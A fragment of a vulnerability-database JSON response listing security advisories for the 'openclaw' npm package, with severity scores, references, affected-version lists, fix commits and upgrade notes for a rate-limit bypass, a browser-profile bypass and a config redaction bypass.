em":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T13:57:23Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-pre-authentication-rate-limit-bypass-in-webhook-token-validation"},{"reference_url":"https://github.com/advisories/GHSA-mf5g-6r6f-ghhm","reference_id":"GHSA-mf5g-6r6f-ghhm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mf5g-6r6f-ghhm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerabili
ty":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerabili
ty":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerabili
ty":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-35646","GHSA-mf5g-6r6f-ghhm"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dbcw-brhj-k7hs"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90343?format=json","vulnerability_id":"VCID-ddf9-tnrt-r7f2","summary":"OpenClaw: Node browser proxy `allowProfiles` bypass through persistent profile mutation and runtime profile selection\n## Summary\nNode browser proxy `allowProfiles` bypass through persistent profile mutation and runtime profile selection\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Real released allowProfiles bypass through profile mutation and runtime profile selection, fixed and shipped in v2026.3.22+, so keep 
open for publish rather than close.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.13-1`\n- Patched versions: `>= 2026.3.22`\n- First stable tag containing the fix: `v2026.3.22`\n\n## Fix Commit(s)\n- `eac93507c36ccd0c359fba18fa466ef6448be8a5` — 2026-03-23T00:56:44-07:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.22`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/eac93507c36ccd0c359fba18fa466ef6448be8a5","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/eac93507c36ccd0c359fba18fa466ef6448be8a5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h5hg-h7rr-gpf3","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-h5hg-h7rr-gpf3"},{"reference_url":"https://github.com/advisories/GHSA-h5hg-h7rr-gpf3","refer
ence_id":"GHSA-h5hg-h7rr-gpf3","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h5hg-h7rr-gpf3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-
kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-
qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-
2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-
ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-h5hg-h7rr-gpf3"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ddf9-tnrt-r7f2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89927?format=json","vulnerability_id":"VCID-dfdk-dhwf-9yaj","summary":"OpenClaw: config.get redaction bypass through sourceConfig and runtimeConfig aliases\n## Summary\n\nconfig.get redaction bypass through sourceConfig and runtimeConfig aliases.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.14`\n- Patched versions: `>= 2026.4.14`\n\n## Impact\n\nAn authenticated gateway client with 
config read access could receive unredacted secrets through alias fields that survived redaction, including provider API keys, gateway auth material, and channel credentials.\n\n## Technical Details\n\nThe fix explicitly overwrites `sourceConfig` and `runtimeConfig` with the same redacted copies used for `resolved` and `config`, including the invalid-snapshot branch. Tests now cover both alias fields.\n\n## Fix\n\nThe issue was fixed in #66030. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `86734ef93a2f25063371b04f1946eb300548acd4`\n- PR: #66030\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43528","reference_id":"","reference_type":"","scores":[{"value":"0.00081","scoring_system":"epss","scoring_elements":"0.24058","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00094","scoring_system":"epss","scoring_elements":"0.26208","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00094","scoring_system":"epss","scoring_elements":"0.26253","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43528"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/86734ef93a2f25063371b04f1946eb300548acd4","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3
.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:57Z/"}],"url":"https://github.com/openclaw/openclaw/commit/86734ef93a2f25063371b04f1946eb300548acd4"},{"reference_url":"https://github.com/openclaw/openclaw/pull/66030","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/66030"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8372-7vhw-cm6q","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T14:10:57Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-8372-7vhw-cm6q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43528","reference_id":"CVE-2026-43528","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43528"},{"reference_url":"https://github.com/advisories/GHSA-8372-7vhw-cm6q","reference_